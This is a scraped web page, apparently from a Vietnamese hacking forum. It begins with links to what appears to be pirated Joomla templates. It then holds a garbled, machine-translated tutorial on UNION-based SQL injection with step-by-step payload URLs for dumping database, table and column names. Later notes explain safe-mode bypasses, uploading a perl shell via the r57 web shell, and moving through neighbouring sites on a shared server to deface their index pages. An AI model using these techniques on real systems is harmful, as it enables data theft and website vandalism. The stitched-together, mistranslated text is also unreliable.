Joomla 1.5 Conversions of Older Designs
Chromatophore - April 08
Synapse - March 08
HiveMind - February 08
MediaMogul - January 08
Populus - December 07
Dimensions - November 07
Equinox - October 07
Firenzie - September 07
Simplix - August 07
Replicant - July 07
Elemental & DarkMatter - June 07
Versatility III - May 07
ColorMatic - April 07
BentoBox - March 07
Vortex & Sporticus News
Sporticus - January 07
Elixer2.0 - December 06
Shock/StormTrooper - November 06
PixelPerfect - October 06
Mobius - September 06
Carbonation & Carbonite - August 06
Versatility II - July 06
Versatility - June 06
Fire - May 06
Technopia - April 06
ModernBusiness - March 06
Extremities 2 - February 06
Internet Gazette - January 06
GeoSync & Bubblicious - December 05
OneMoreThing - November 05
Tribute - October 05
VividDesign - September 05
TechnoZine - August 05
GlobalBiz - July 05
DigiMania - June 05
Macphoria & Aphelion - May 05
Digital Ether & OpenOffice - April 05
BusinessSense & GlossyPaint - March 05
Blogtopia - February 05
PrimeTime - January 05


All Rocket Labs Templates :



Solstice
Dimensions Mods
Equinox Essentials
Mobius - RokStar Edition
Versatility II - RokStar Edition
Outland - World of Warcraft Variation
WoWTrooper - World of Warcraft Variation
Mobius Dark
SubtleTrooper Dark

http://rapidshare.com/files/111531348/RocketTheme.com.part1.rar
http://rapidshare.com/files/111535467/RocketTheme.com.part2.rar
http://rapidshare.com/files/111539836/RocketTheme.com.part3.rar
http://rapidshare.com/files/111545005/RocketTheme.com.part4.rar
http://rapidshare.com/files/111549154/RocketTheme.com.part5.rar

SQL Injection là gì?

Nó định nghĩa chính nó, nó cho phép thực hiện các lệnh SQL. (trong ngắn hạn)
Phạm discloses thông tin nhạy cảm như người sử dụng, mật khẩu, thông tin thẻ tín dụng, khá nhiều tất cả mọi thứ được lưu trữ trong cơ sở dữ liệu ...

Làm thế nào để kiểm tra xem nếu một trang web là dễ bị tổn thương bình thường sql injection
Nói cho phép chúng tôi có một trang web: http://www.website.com/shop.php?id=10
Chúng tôi có thể thêm vào xe đặc biệt nào để kết thúc như ', ", vv .., điều này sẽ làm cho liên kết:
http://www.website.com/shop.php?id=10 '
Bây giờ, nếu chúng tôi nhận được một lỗi như:
Lỗi cú pháp trong SQL tại ....
mysql_fetch ......
mysql_num .....
Và các công cụ như thế, bạn sẽ có được những bức tranh tôi hy vọng ....
Sau đó, nó thường là do các trang web là dễ bị tổn thương.

Bây giờ, chúng tôi biết từ các trang web là dễ bị tổn thương, chúng tôi đã đi qua một vài bước sau để có được những thông tin mà chúng tôi đang tìm kiếm, chúng là:
Mã số:

1. Tìm số lượng các cột
2. Kiểm tra nếu làm việc UNION.
3. Tìm kiếm một thể nhìn thấy cột
3. Kiểm tra xem phiên bản> 5
4. Extracting bảng tên, cột tên, vv .. (Bruteforcing Hoặc nếu là phiên bản <5)
5. Hình thành các truy vấn kết thúc để trích xuất của chúng tôi thông tin cần thiết.

Tìm số lượng các cột
Để tìm số lượng các cột, chúng tôi có thể sử dụng của ĐẶT HÀNG, miễn là nó isnt lọc được.
http://www.website.com/shop.php?id=10
Nếu đó là trang web của chúng tôi dễ bị tổn thương .... chúng tôi lần đầu tiên thử nghiệm, nếu đặt hàng của isnt lọc.
+ + http://www.website.com/shop.php?id=10 lệnh của +1- - (shouldnt Bạn nhận được lỗi nào)
+ + http://www.website.com/shop.php?id=10 thứ tự của +10000- - (Bạn sẽ nhận được một lỗi)
Nếu bạn làm thế, thì bạn cũng tốt và tiếp tục ..
+ + http://www.website.com/shop.php?id=10 lệnh của +2- --
+ + http://www.website.com/shop.php?id=10 lệnh của +3- --
+ + http://www.website.com/shop.php?id=10 lệnh của +4- --
+ + http://www.website.com/shop.php?id=10 lệnh của +5- - <--- incrementing Giữ cho đến khi bạn nhận được một lỗi, cho tôi khi các lệnh của 5 (trong thế giới của tưởng tượng ).

Mã số:

Sau đó, số lượng các cột là số trước khi lỗi, trong trường hợp của tôi 4.
Giữ incrementing số như thế cho đến khi một trong những mỹ ngày bạn nhận được một lỗi, đau isnt it?
Nếu bạn đã có thể giúp bạn thông minh ra phương pháp khác .... kiểm tra của nó, nếu từ 1 đến 10, và sau đó làm 10-20,20-30 **** như thế ... nhưng bây giờ chỉ cần giữ cho đến khi bạn nhận được incrementing một lỗi.

Bây giờ, nếu bạn biết số lượng các cột, bạn có thể tạo thành công đoàn yêu cầu tìm kiếm:
http://www.website.com/shop.php?id=10 là trang web của chúng tôi
Nếu số lượng các cột của chúng tôi là 4 (như trong trường hợp của tôi) sau đó chúng tôi lựa chọn công đoàn 1,2,3,4 (Chúng tôi có thể thay thế các số điện thoại, điều này chỉ là để truy cập)
http://www.website.com/shop.php?id=10 + u ... +1,2,3,4 --
Điều đó sẽ được kết thúc của chúng tôi liên kết.
Bây giờ, chúng ta phải tìm một thể nhìn thấy cột ....
Hãy tìm một số, tôi là đảm bảo rằng bạn có thể thông báo ....... nó cần được nhìn thấy các cột ...
Chọn nó, ví dụ như nếu bạn thấy con số 2 trên trang web, đó là nhìn thấy cột ..
http://www.website.com/shop.php?id=10 + u ... LUMN ,3,4 --
Chúng tôi có thể sử dụng nó để trích xuất thông tin.


3. Kiểm tra xem phiên bản> 5
Chúng tôi cần phải kiểm tra xem là phiên bản> 5 (RẤT RẤT QUAN TRỌNG BƯƠC)
Để làm được điều này, chúng tôi lựa chọn của chúng tôi nhìn thấy cột ... trong trường hợp này là 2 ... và chúng tôi thay thế nó bằng phiên bản @ @
http://www.website.com/shop.php?id=10 + u ... Sion ,3,4 --
Nếu bạn gặp một lỗi như bất hợp pháp kết hợp của collations blah blah blah blah và cho các hoạt động 'UNION' Trong một số trường hợp hiếm hoi hay bất kỳ lỗi, bạn có thể sử dụng:
http://www.website.com/shop.php?id=10 + u ... (@ @ version)) ,3,4 --
http://www.website.com/shop.php?id=10 + u ... (@ @ phiên bản bằng cách sử dụng latin1) ,3,4 --
Bây giờ, bạn sẽ thấy các phiên bản ....
Bạn nên đầu tiên hãy kiểm tra xem nếu CNTT lớn hơn 5, ngay bây giờ ..
Nếu có, bạn có thể tiến hành hoặc bạn có đoán TABLE NAMES NẾU NHỮNG NGƯỜI BÊN DƯỚI phiên bản 5.
Bây giờ, nếu bạn biết phiên bản cao hơn 5 sau đó, chúng tôi có thể tiếp tục hoặc bạn sẽ cần phải Goto cuối này đoán tốt hướng dẫn về kỹ thuật.


4. Extracting bảng tên, cột tên, vv ..
Bây giờ, từ information_schema hiện có sẵn trong các phiên bản là lớn hơn 5, chúng tôi có thể sử dụng nó để nhận được:

Mã số:

1. Cơ sở dữ liệu tên
2. Bảng tên
3. Cột tên
Cơ sở dữ liệu nhận được các tên:

Bây giờ chúng tôi sẽ nhận được phiên bản và tên cơ sở dữ liệu người sử dụng tất cả các từ với nhau, chúng tôi biết được nhìn thấy cột (nhìn thấy cột như đã nói với tôi trước khi đi là để giúp chúng tôi nhận được dữ liệu, chúng ta cần).

Mã số:

+ http://www.website.com/shop.php?id=10 công đoàn chọn +1, concat_ws (0x3a, phiên bản (), người sử dụng (), cơ sở dữ liệu ()), 3,4 --

Trong hầu hết các hương dân chúng sử dụng "concat_ws" và có rất nhiều newbies confuse với điều đó. Nó thực sự có nghĩa là với concat separator separator và chúng tôi sử dụng phải được đưa ra trong đầu của các cú pháp. Ở đây tôi có được sử dụng 0x3a tương đương là ":". Các mục đích chính của việc sử dụng này là nhận được kết quả mong muốn định dạng trong khi chúng tôi cần nó để được.
Phiên bản ()-đề cập đến phiên bản của Mysql được sử dụng trong các máy chủ
Người sử dụng () - đề cập đến Mysql người dùng đã đăng ký trong cơ sở dữ liệu.
Cơ sở dữ liệu () - Tên cơ sở dữ liệu
Nó sẽ nhận được đầu ra ở định dạng 5,034-debian_7etch-đăng nhập: h4cky0u @ localhost: h4cky0u.
Bây giờ chúng tôi đang sử dụng để grab Information_schema tên cơ sở dữ liệu (S).
+ + http://www.website.com/shop.php?id=1 UNION CHỌN +1, group_concat (schema_name), từ 3,4 + + information_schema.schemata -
Trong những nơi dễ bị tổn thương cột của chúng tôi là bằng cách sử dụng lệnh để lấy lại dữ liệu
group_concat (expr) sẽ đem lại một chuỗi kết quả với các concatenated không Null các giá trị từ một nhóm.
và ở phần cuối của các cột, chúng tôi sẽ thêm
+ + từ information_schema.schemata-trả lại các cơ sở dữ liệu trên máy chủ
Chúng tôi có thể nhận được tên cơ sở dữ liệu không phụ thuộc vào các cơ sở dữ liệu hiện tại.
Giống như bạn sẽ có information_schema, h4cky0u, cơ sở dữ liệu, mysql, người sử dụng.
Đây là những cơ sở dữ liệu tên.
Extracting bảng tên:
Bây giờ, từ cơ sở dữ liệu mà chúng tôi biết tên ...... chúng ta cần phải nhận được bảng tên cho các cơ sở dữ liệu.
Tôi đã chọn cơ sở dữ liệu 'của người sử dụng để trích xuất bảng tên của chúng tôi.
Để nhận được bảng tên, chúng tôi đã sử dụng cơ sở dữ liệu information_schema và bảng bảng và cột table_name để trích xuất các bảng tên.
Vì vậy, trang web của chúng tôi là website.com
+ + http://www.website.com/shop.php?id=1 UNION CHỌN +1, group_concat (table_name), từ 3,4 + + information_schema.tables -
Điều này mang lại cho chúng tôi bảng mà chúng tôi không cần phải quá, chúng tôi chỉ muốn bàn cho các bảng người sử dụng.
Vì vậy: http://www.website.com/shop.php?id=1 + + UNION CHỌN +1, group_concat (table_name), từ 3,4 + + + information_schema.tables nơi table_schema + = 'users' -
Đôi khi, bạn cần phải hex nó: Nó sẽ trở thành http://www.website.com/shop.php?id=1 + + UNION CHỌN +1, group_concat (table_name), từ 3,4 + + + information_schema.tables nơi + table_schema = 0x7573657273 -
Điều này mang lại cho chúng tôi tất cả các bảng tên. Bây giờ chúng tôi lựa chọn một bảng hoặc một USEFUL bảng mà từ đó chúng tôi muốn trích xuất thông tin. Tôi sẽ đưa người sử dụng bảng, ví dụ.


Extracting cột tên:
Bước kế tiếp là để có được các cột trong các bảng biểu mà thực sự giữ dữ liệu. Chúng tôi đã được tìm thấy có thể có một bảng tên "người sử dụng" và chúng tôi trích xuất các cột từ nó.

+ + www.website.com/shop.php?id=10 UNION SE ... olumn_name), từ 3,4 + + + information_schema.columns WH ere + table_name = 'USERS' --

Một lần nữa chúng tôi thay thế dễ bị tổn thương cột số với các lệnh sau.
group_concat (column_name), chúng tôi sẽ thay thế các cột số 2 với này
column_name extracts tên nay tất cả các cột trong bảng.
Và thêm này vào ngày cuối cùng của cột
information_schema.columns từ: + + + + nơi table_name = 'USERS' -
Nó sẽ hiển thị các cột trong bảng. Nếu nó hiển thị một lỗi như thế
Không hợp lệ yêu cầu tìm kiếm: bạn có một lỗi trong cú pháp SQL của bạn, hãy kiểm tra bằng tay mà tương ứng với máy chủ của bạn Mysql phiên bản quyền cú pháp để sử dụng ở gần 'USERS'-' ở dòng1.
Laøm chaäm này và các quy trình của chúng tôi xuống. Tất cả chúng tôi phải làm là để có được một số trực tuyến hexadecimal công cụ chuyển đổi và chuyển đổi bảng tên

chúng ta thường local shell qua server cần attack thì chúng ta dùng lệnh cp [path host1 ] [host2]
cp = copy , đơn giản là chúng ta copy cái file shell ở host1 qua host 2 giống như chúng ta dùng lệnh copy 1 tập tin từ hda qua hdb .
còn về Chmod là các phân quyền trong hệ điều hành của máy server, trong linux thì permision sẽ được chia làm nhiều cấp bậc , cao nhất là root , đến owner group , và cuối cùng là đến Other , thường thì nếu các server Chmod kỹ sẽ không cho Other được bất cứ quyền gì.Gowner Group sẽ có được một số quyền hạn giống như root ở một số tập tin, còn Root (gốc rễ, ông vua) là người có toàn quyền trên server.
Và từ đó chúng ta có thể định hình được Chmod chỉ đơn giản là các quyền cho phép đối với người dùng.
Chmod được chia ra làm 4 chế độ:
1. r (read) :Quyền đọc , người được quyền này sẽ đọc được các tập tin nhưng không được viết (sửa đổi ), hoặc thực thi.
2. w (write ) : quyền viết , người có quyền này sẽ có thể sửa đổi các tập tin.
3.x (execute): quyền thực thi.
4. và cuối cùng là _ : tức là không có quyền gì cả = Null
vd : _rwxrwxrwx index.php
tức là tất cả mọi người dùng đều có toàn quyền trên file index.php
_rwxr_xr__ index.php
Chỉ có root (owner) mới được toàn quyền , Owner Group được quyền đọc và thực thi nhưng không được quyền ghi, Other được quyền đọc và thực thi nhưng không được quyền ghi
Nhưng để tiện hơn trong việc phân quyền thì người ta gán cho chúng những con số .
r = 4
w = 2
x = 1
như vậy nếu 1 file được chmod 755 tức file đó sẽ tương đương _rwxr_xr_x


_cách bypass bằng mysql chỉ dùng với user nobody , vì với các user bt thì thường mysql nó phân quyền ko truy cập File qua lẫn nhau đc

_khi sv bật cURL On : ta có thể Eval đoạn php code sau để view File , vd:
_ko Dis fopen
_
quy định đuờng dẫn save file passwd mà ta có quyền ghi

_dùng hàm gzfile, readgzfile, gzopen nữa, chức năng nó tương tự như các hàm file, readfile, fopen

_Nếu gặp trường hợp SV bật Safe-Mode và có thể là Disable một số hàm quan trọng:
Xem xét lại nếu SV cho phép upload hoặc tạo thư mục mới hay ko( chú í tới uid nếu uid=owner thì ổn cả).
Tạo 1 thư mục mới và chmod cho nó là 775( dùng để up con cgitenet.pl).Đây là con shell dùng perll script nên dù Safe-Mode hay dis các hàm php thì cũng không ảnh hưởng gì tới các chức năng script của con perl này.
Up con cgitenet.pl này lên host của victim ( nên dùng shell là r57 ) .Trong phần Download files from remote ftp-server của con r57 điền thông tin con cgitenet.pl trên host của ta vào( host chứa perl shell của mình phải hỗ trợ upload qua FTP )
FTP-server:
Login:
Password:
File on ftp:
Local file:
Transfer mode: ASCII

Chú ý : riêng con perl shell này thì Get về host victim phải chọn chế độ ASCII
chmod lại cho cgitenet.pl lại thành 775.
Sau đó chạy shell cgitenet.pl trên SV của victim là ổn .

Tình hình là em vừa mới hiểu ra thế nào là local nên em pót luôn theo đề nghị của nhiều anh em . Có lẽ em làm bài này chỉ để cho những ai chưa hiểu tí j` về shell ( như em hôm qua ) nên mong các bác đừng chê cười và nếu có rì thiếu sót mong các bác bổ sung.
Bài này em sẽ nói những cái gọi là siêu siêu siêu ... cơ bản về r57 (những cái mình ko nói là phải tự học lấy nhá ) .
I. Cơ bản về r57.
1. Các thông tin ta có thể thấy đc qua shell.
- Safe-mode: On => Đây là chức năng bảo mật bật. Cái này chỉ có 2 kiểu là bật (on) và tắt (off) (đương nhiên) và rõ ràng là khi dùng shell thì vớ phải thằng safe-mode off dễ ăn hơn thằng on.
- PHP version: 4.4.6 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: ON Oracle: OFF => Đây là các chức năng của trang web đc bật hay tắt ( nhìn thì tự biết ).
- Disable functions: Đây là các hàm nó cấm ko cho sử dụng. Nếu là NONE thì nó chẳng cấm thằng nào. Còn như ở ví dụ trên nó cấm sử dụng các hàm : ini_alter,system,passthru,shell_exec,leak,listen,c hgrp,apache_setenv,define_syslog_variables,openlog ,syslog,ftp_exec.
- HDD Free : 85.49 GB HDD Total : 4733.08 GB => cái lày có cần nói ko nhỉ ???
- Ở cái hộp ngay bên dưới có quả "uname -a : Linux v8 2.6.18.1-grsec+e+f6b+gr219+opt+c4a+gr2b-grsec #1 SMP Thu Oct 19 12:50:29 PDT 2006 i686 GNU/Linux" => Thằng này nó dùng hệ điều hành GNU/Linux ( Chả hiểu j` nhưng thấy trên mấy trang cho tải hđh linux hay có cái GNU này )
- pwd : /home/.orzo/myebuddy/MY-IDIR.COM ( drwxr-xr-x ) => Mình đang ở trong thư mục /home/.orzo/myebuddy/MY-IDIR.COM. Còn cái drwxr-xr-x là mấy cái quyền của mình ở trong thư mục này đã đc thằng admin nó chmod từ trước ( ko biết đã chính xác chưa ).
- Và còn 1 ô ở ngay dưới rất hoành tá tràng là "Executed command", ở đó bao gồm có 10 cột nhưng chỉ cần chú ý nhất vào 2 cột đó là cột thứ 2 và cột thứ 10.
+ Cột thứ 2 : Nó ghi các quyền của mình có thể làm đc j` với file hoặc thư mục ở cột thứ 10. VD: drwxrwxrwx => chmod 777 hay còn gọi là owner user tức là toàn quyền với file hoặc thư mục đó nhưng gặp đc cái thằng như thế này có lẽ chỉ vài lần trong đời
+ Cột thứ 10 : Nó liệt kê các file và thư mục trong cái thư mục cắm con shell ( ở đây là /home/.orzo/myebuddy/MY-IDIR.COM ) và tất nhiên sẽ thấy luôn cả con shell
2. Làm việc trong r57.
- Run command (ngay dòng đầu tiên) : ô này để đánh các lệnh để chạy shell trong trường hợp này là các lệnh trong linux (cái này thì phải tìm hiểu). Nếu shell nó thông báo là server bật chế độ bảo mật (safe-mode on) thì dòng này sẽ ko có.
- Work directory : Đây là nơi mình đang làm việc (con shell đang ở trong thư mục này). Ở dòng này các bạn chỉ đánh đc tên của các thư mục mà mình muốn vào, còn muốn sem file hay chỉnh sửa file thì phải dùng đến dòng bên dưới. Trong trường hợp này mình đang làm việc trong thư mục và /home/.orzo/myebuddy/MY-IDIR.COM. Nếu bạn muốn vào thư mục daulom thì cần phải đánh /home/.orzo/myebuddy/MY-IDIR.COM/daulom rùi ấn vào Execute.
- File for edit : Nếu bạn muốn sem hoặc sửa 1 file ( mình khoái nhất là sửa file index ) thì sẽ đánh tên file đó vào. Ví dụ bạn muốn sửa file index.html ở trường hợp này bạn cần đánh /home/.orzo/myebuddy/MY-IDIR.COM/index.html rồi ấn vào edit file. Tuyệt đối ko nên nhầm lẫn thằng này với thằng work directory ở bên trên. Cần hiểu rõ rằng thằng này chỉ dung để đọc hoặc sửa file, còn thằng bên trên thì chỉ dung để đi ra hoặc vào 1 thư mục.
- Mấy cái find fủng với upload ở bên dưới thì bạn tự hiểu nhá.
- Đến phần Database:
+ Ô login : Điền dbuser.
+ Password: Điền dbpass.
+ Database: Điền dbname.
Muốn có những thong tin để điền vào mấy cái ông bên dưới này thì phải tự tìm hiểu thôi, mình cũng chẳng biết hướng dẫn thế nào nữa .

II. Local hack.
Hờ, cái này thì cũng đơn giản thôi, ko quá khó như mọi người vẫn tưởng ( theo bác backdoor là kiểu hack dễ nhất ). Cái thể loại local chỉ đơn giản như ở trong win chuyển từ thư mục này sang thư mục khác thôi. Trên server mỗi trang web nằm trong các thư mục khác nhau. Bạn chỉ việc chuyển từ thư mục đang có con shell sang 1 thư mục bên ngoài khác (cái này đọc kĩ phần Work directory nhá) rồi tự nhiên thấy 1 user của 1 trang web nào đó rồi đi vào thư mục đấy rồi vào phần edit, sửa lại cái index rồi ... Thế là song ---->>> Deface website auHang: